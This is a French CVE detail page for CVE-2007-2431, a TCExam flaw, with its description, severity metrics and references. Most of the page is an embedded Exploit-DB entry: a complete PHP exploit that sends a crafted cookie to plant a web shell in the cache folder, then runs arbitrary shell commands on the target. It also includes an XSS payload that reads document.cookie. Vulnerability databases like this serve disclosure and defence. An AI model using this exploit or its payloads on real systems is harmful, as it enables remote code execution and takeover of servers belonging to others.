CVE-2007-2431 : Détail

CVE-2007-2431

1.94%V3
Network
2007-05-01
22h00 +00:00
2017-10-09
22h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Dynamic variable evaluation vulnerability in shared/config/tce_config.php in TCExam 4.0.011 and earlier allows remote attackers to conduct cross-site scripting (XSS) and possibly other attacks by modifying critical variables such as $_SERVER, as demonstrated by injecting web script via the _SERVER[SCRIPT_NAME] parameter.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 3816

Date de publication : 2007-04-28 22h00 +00:00
Auteur : rgod
EDB Vérifié : Yes

<?php print_r(' -------------------------------------------------------------------------- TCExam <= 4.0.011 $_COOKIE["SessionUserLang"] shell injection exploit by rgod mail: retrog at alice dot it site: http://retrogod.altervista.org --------------------------------------------------------------------------- '); /* download site: http://sourceforge.net/projects/tcexam/ vulnerable code in /shared/code/tce_tmx.php lines 92-110: ... public function __construct($tmxfile, $language, $cachefile="") { // reset array $this->resource = array(); // set selecteed language $this->language = strtoupper($language); // set filename for cache $this->cachefile = $cachefile; if (file_exists($this->cachefile)) { // read data from cache require_once($this->cachefile); $this->resource = $tmx; } else { if (!empty($this->cachefile)) { // open cache file file_put_contents($this->cachefile, "<"."?php\n". "// CACHE FILE FOR LANGUAGE: ".$language."\n". "// DATE: ".date("Y-m-d H:i:s")."\n". "// *** DELETE THIS FILE TO RELOAD DATA FROM TMX FILE ***\n", FILE_APPEND); } ... $language argument is not checked for php injection, look at /shared/config/tce_config.php (various commets stripped): ... if(isset($_REQUEST['lang']) AND (strlen($_REQUEST['lang']) == 2) AND (array_key_exists($_REQUEST['lang'],unserialize(K_AVAILABLE_LANGUAGES)))) { define ("K_USER_LANG", $_REQUEST['lang']); setcookie("SessionUserLang", K_USER_LANG, time() + K_COOKIE_EXPIRE, K_COOKIE_PATH, K_COOKIE_DOMAIN, K_COOKIE_SECURE); } elseif (isset($_COOKIE['SessionUserLang'])) { define ("K_USER_LANG", $_COOKIE['SessionUserLang']); } else { define ("K_USER_LANG", K_LANGUAGE); } require_once('../../shared/code/tce_tmx.php'); // TMX class $lang_resources = new TMXResourceBundle(K_PATH_TMX_FILE, K_USER_LANG, K_PATH_CACHE.basename(K_PATH_TMX_FILE, ".xml")."_".K_USER_LANG.".php"); // istantiate new TMXResourceBundle object $l = $lang_resources->getResource(); // language array ... you can pass a special crafted 'SessionUserLang' cookie to create a new file in /cache folder and inject a newline and some php code inside of it, ex: ... Cookie: SessionUserLang=%2F..%2F%0Asystem%28%24_GET%5BCMD%5D%29%3B%3F%3E%23%2F..%2Fsuntzu; ... a new file called suntzu.php like this is created in /cache folder; <?php // CACHE FILE FOR LANGUAGE: /../ system($_GET[CMD]);?>#/../suntzu // DATE: 2007-04-29 16:07:25 // *** DELETE THIS FILE TO RELOAD DATA FROM TMX FILE *** // EOF ---------- ?> which is directly accessible, then you launch commands: http://[target]/[path_to_tcexam]/cache/suntzu.php?CMD=ls%20-la this works regardless of php.ini settings also I found some xss's because of this code /shared/config/tce_config.php near lines 208-211: ... // --- get posted and get variables (to be compatible with register_globals off) foreach ($_REQUEST as $postkey => $postvalue) { $$postkey = $postvalue; } ... which allows to overwrite the $_SERVER[] array and God only knows what: ex: http://[target]/[path]/public/code/index.php?_SERVER[SCRIPT_NAME]="><script>alert(document.cookie)</script> */ if ($argc<4) { print_r(' --------------------------------------------------------------------------- Usage: php '.$argv[0].' host path cmd OPTIONS host: target server (ip/hostname) path: path to tcexam cmd: a shell command Options: -p[port]: specify a port other than 80 -P[ip:port]: specify a proxy Example: php '.$argv[0].' localhost /tcexam/ ls -la -P1.1.1.1:80 php '.$argv[0].' localhost /tcexam/ ls -la -p81 --------------------------------------------------------------------------- '); die; } error_reporting(7); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function send($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); $parts[1]=(int)$parts[1]; echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); } $host=$argv[1]; $path=$argv[2]; $cmd=""; $port=80; $proxy=""; for ($i=3; $i<$argc; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if (($temp<>'-p') and ($temp<>'-P')) {$cmd.=" ".$argv[$i];} if ($temp=="-p") { $port=(int)str_replace("-p","",$argv[$i]); } if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } } if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} $exploit=urlencode("/../\neval(\$_SERVER[HTTP_CMD]);?>#/../suntzu"); $packet ="GET ".$p."public/code/index.php HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="User-Agent: Googlebot/2.1\r\n"; $packet.="Cookie: SessionUserLang=$exploit;\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; send($packet); sleep(1); $packet ="GET ".$p."cache/suntzu.php HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="User-Agent: Googlebot/2.1\r\n"; $packet.="CMD: echo '_delim_';error_reporting(7);set_time_limit(0);passthru(\$_SERVER[HTTP_C]);echo '_delim_';\r\n"; $packet.="C: ".$cmd."\r\n"; $packet.="Connection: Close\r\n\r\n"; send($packet); if (eregi("_delim_",$html)){ $temp=explode("_delim_",$html); echo $temp[1]; } else {echo "exploit failed...see html...\n$html";} ?> # milw0rm.com [2007-04-29]

Products Mentioned

Configuraton 0

Tecnick.com>>Tcexam >> Version To (including) 4.0.011

    Références

    http://secunia.com/advisories/25008
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.securityfocus.com/bid/23704
    Tags : vdb-entry, x_refsource_BID
    https://www.exploit-db.com/exploits/3816
    Tags : exploit, x_refsource_EXPLOIT-DB